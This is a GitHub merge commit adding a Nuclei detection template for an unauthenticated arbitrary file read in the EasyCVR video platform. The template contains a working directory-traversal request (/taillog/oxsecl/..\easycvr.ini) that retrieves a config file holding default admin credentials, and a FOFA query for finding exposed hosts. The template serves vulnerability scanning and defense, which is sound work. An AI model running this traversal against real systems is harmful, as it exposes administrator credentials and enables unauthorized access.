Merge pull request #11376 from Kazgangap/easycvr-arbitrary-file-read

add easycvr-arbitrary-file-read
projectdiscovery · Dec 23, 2024 · b2de40a · b2de40a
2 parents 4e86b55 + f4af46f
commit b2de40a
Showing 1 changed file with 46 additions and 0 deletions.
diff --git a/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml b/http/vulnerabilities/other/easycvr-arbitrary-file-read.yaml
@@ -0,0 +1,46 @@
+id: easycvr-arbitrary-file-read
+
+info:
+  name: EasyCVR Video Management - Arbitrary File Read
+  author: s4e-io
+  severity: high
+  description: |
+    The EasyCVR-video management platform taillog interface has an arbitrary file read vulnerability. Unauthenticated attackers can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc., which puts the website in an extremely insecure state.
+  remediation: |
+    Ensure that the application does not allow directory traversal or access to sensitive files through web requests. Implement proper input validation and restrict access to critical files.
+  reference:
+    - https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486259&idx=1&sn=dd51ca8df3aa1533144b975b9bec3086
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: icon_hash="458134656"
+  tags: easycvr,unauth,lfi
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "<title>EasyCVR")'
+          - "status_code == 200"
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "default_admin_user", "default_admin_password")'
+          - 'contains(content_type, "text/plain")'
+          - "status_code == 200"
+        condition: and